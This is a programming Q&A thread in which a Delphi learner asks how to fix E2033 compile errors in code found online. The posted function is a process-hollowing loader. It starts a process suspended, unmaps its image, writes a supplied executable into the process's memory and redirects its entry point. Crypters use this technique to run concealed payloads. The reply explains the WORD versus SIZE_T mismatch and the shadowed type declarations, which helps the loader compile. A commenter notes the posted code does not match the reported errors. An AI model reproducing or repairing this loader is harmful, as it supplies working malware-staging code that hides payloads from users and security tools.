# Fix "Types of actual and formal var parameters must be identical" in Delphi Source

Tags: delphi

Hello I am studying Delphi Delphi XE2 version using to do it, I found a code on the internet that want to study and test but the problem is that it gives me the following errors:

```
[DCC Error] Unit1.pas(97): E2033 Types of actual and formal var parameters must be identical
[DCC Error] Unit1.pas(111): E2033 Types of actual and formal var parameters must be identical
[DCC Error] Unit1.pas(121): E2033 Types of actual and formal var parameters must be identical
[DCC Error] Unit1.pas(132): E2033 Types of actual and formal var parameters must be identical
```

The source :

```
unit Unit1;

interface

uses
  Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants, System.Classes, Vcl.Graphics,
  Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.StdCtrls;

type
  TForm1 = class(TForm)
    Button1: TButton;
    procedure Button1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

Function test_now(Buffer :Pointer;Parameters: String; Visible: Boolean): TProcessInformation;
type
  HANDLE        = THandle;
  PVOID         = Pointer;
  LPVOID        = Pointer;
  SIZE_T        = Cardinal;
  ULONG_PTR     = Cardinal;
  NTSTATUS      = LongInt;
  LONG_PTR      = Integer;

  PImageSectionHeaders = ^TImageSectionHeaders;
  TImageSectionHeaders = Array [0..95] Of TImageSectionHeader;
Var
  ZwUnmapViewOfSection  :Function(ProcessHandle: THANDLE; BaseAddress: Pointer): LongInt; stdcall;
  ProcessInfo           :TProcessInformation;
  StartupInfo           :TStartupInfo;
  Context               :TContext;
  BaseAddress           :Pointer;
  BytesRead             WORD;
  BytesWritten          WORD;
  I                     :ULONG;
  OldProtect            :ULONG;
  NTHeaders             :PImageNTHeaders;
  Sections              :PImageSectionHeaders;
  Success               :Boolean;
  ProcessName           :string;

Function ImageFirstSection(NTHeader: PImageNTHeaders): PImageSectionHeader;
Begin
  Result := PImageSectionheader( ULONG_PTR(@NTheader.OptionalHeader) +
                                 NTHeader.FileHeader.SizeOfOptionalHeader);
End;

Function Protect(Characteristics: ULONG): ULONG;
Const
  Mapping       :Array[0..7] Of ULONG = (
                 PAGE_NOACCESS,
                 PAGE_EXECUTE,
                 PAGE_READONLY,
                 PAGE_EXECUTE_READ,
                 PAGE_READWRITE,
                 PAGE_EXECUTE_READWRITE,
                 PAGE_READWRITE,
                 PAGE_EXECUTE_READWRITE  );
Begin
  Result := Mapping[ Characteristics SHR 29 ];
End;
Begin
  @ZwUnmapViewOfSection := GetProcAddress(LoadLibrary('ntdll.dll'), 'ZwUnmapViewOfSection');
  ProcessName := ParamStr(0);

  FillChar(ProcessInfo, SizeOf(TProcessInformation), 0);
  FillChar(StartupInfo, SizeOf(TStartupInfo),        0);

  StartupInfo.cb := SizeOf(TStartupInfo);
  StartupInfo.dwFlags := STARTF_USESHOWWINDOW;
  if Visible Then
    StartupInfo.wShowWindow := SW_NORMAL
  else
    StartupInfo.wShowWindow := SW_Hide;

  If (CreateProcess(PChar(ProcessName), PChar(Parameters), NIL, NIL,
                    False, CREATE_SUSPENDED, NIL, NIL, StartupInfo, ProcessInfo)) Then
  Begin
    Success := True;
    Result := ProcessInfo;

    Try
      Context.ContextFlags := CONTEXT_INTEGER;
      If (GetThreadContext(ProcessInfo.hThread, Context) And
         (ReadProcessMemory(ProcessInfo.hProcess, Pointer(Context.Ebx + 8),
                            @BaseAddress, SizeOf(BaseAddress), BytesRead)) And
         (ZwUnmapViewOfSection(ProcessInfo.hProcess, BaseAddress) >= 0) And
         (Assigned(Buffer))) Then
         Begin
           NTHeaders    := PImageNTHeaders(Cardinal(Buffer) + Cardinal(PImageDosHeader(Buffer)._lfanew));
           BaseAddress  := VirtualAllocEx(ProcessInfo.hProcess,
                                          Pointer(NTHeaders.OptionalHeader.ImageBase),
                                          NTHeaders.OptionalHeader.SizeOfImage,
                                          MEM_RESERVE or MEM_COMMIT,
                                          PAGE_READWRITE);

           If (Assigned(BaseAddress)) And
              (WriteProcessMemory(ProcessInfo.hProcess, BaseAddress, Buffer,
                                  NTHeaders.OptionalHeader.SizeOfHeaders,
                                  BytesWritten)) Then
              Begin
                Sections := PImageSectionHeaders(ImageFirstSection(NTHeaders));

                For I := 0 To NTHeaders.FileHeader.NumberOfSections -1 Do
                  If (WriteProcessMemory(ProcessInfo.hProcess,
                                         Pointer(Cardinal(BaseAddress) +
                                                 Sections[i].VirtualAddress),
                                         Pointer(Cardinal(Buffer) +
                                                 Sections[i].PointerToRawData),
                                         Sections[i].SizeOfRawData, BytesWritten)) Then
                     VirtualProtectEx(ProcessInfo.hProcess,
                                      Pointer(Cardinal(BaseAddress) +
                                              Sections[i].VirtualAddress),
                                      Sections[i].Misc.VirtualSize,
                                      Protect(Sections[i].Characteristics),
                                      OldProtect);


                If (WriteProcessMemory(ProcessInfo.hProcess,
                                       Pointer(Context.Ebx + 8), @BaseAddress,
                                       SizeOf(BaseAddress), BytesWritten)) Then
                   Begin
                     Context.EAX := ULONG(BaseAddress) +
                                    NTHeaders.OptionalHeader.AddressOfEntryPoint;
                     Success := SetThreadContext(ProcessInfo.hThread, Context);
                   End;
              End;
         End;
    Finally
      If (Not Success) Then
        TerminateProcess(ProcessInfo.hProcess, 0)
      else
        ResumeThread(ProcessInfo.hThread);
    End;
  End;
End;

procedure TForm1.Button1Click(Sender: TObject);
begin
ShowMessage('test');
end;

end.
```

as I fix this error in the code ?

Comment: In the future, if you're going to reference the error messages and then post a bunch of lines of code, it would be helpful if you would place a comment in that code to indicate the lines that cause the error. (IOW, which lines are line 97, 111, 121, and 131, so we don't have to copy/paste into an editor to find them. Help us help you by providing the information you have on your screen that we can't see from where we're sitting.)

Comment: It would also be best to post the real code. This code doesn't produce those errors.

Answer (score 2):

You can work this out by reading the error message, and looking at the code.

So, at line 97 we see this:

```
ReadProcessMemory(ProcessInfo.hProcess, Pointer(Context.Ebx + 8),
                  @BaseAddress, SizeOf(BaseAddress), BytesRead)
```

The error message is:

```
E2033 Types of actual and formal var parameters must be identical
```

So, we are looking for a `var` parameter. Now, let's look at the function declaration. It is:

```
function ReadProcessMemory(hProcess: THandle; const lpBaseAddress: Pointer; 
  lpBuffer: Pointer; nSize: SIZE_T; var lpNumberOfBytesRead: SIZE_T): BOOL; stdcall;
```

The only `var` parameter is the final parameter. It has type `SIZE_T`. That's an unsigned integer of pointer size. For a 32 bit application that is a 32 bit unsigned value. You are passing a variable of type `WORD`. Which is a 16 bit unsigned value. So, there's the mismatch.

Your next problem is that your code declares a number of types that hide the types in the Windows unit. Remove this code:

```
type
  HANDLE        = THandle;
  PVOID         = Pointer;
  LPVOID        = Pointer;
  SIZE_T        = Cardinal;
  ULONG_PTR     = Cardinal;
  NTSTATUS      = LongInt;
  LONG_PTR      = Integer;
```

Comment: Ok , i trying change "BytesRead:WORD;" and "BytesWritten:WORD;" to size_t and the error continues , I have to do to fix it ?

Comment: Did you write this code, or did you just paste it from somewhere else? Also, the code in the question doesn't match the error messages that you report. You should always post the actual code that you are using. My update should get you further on.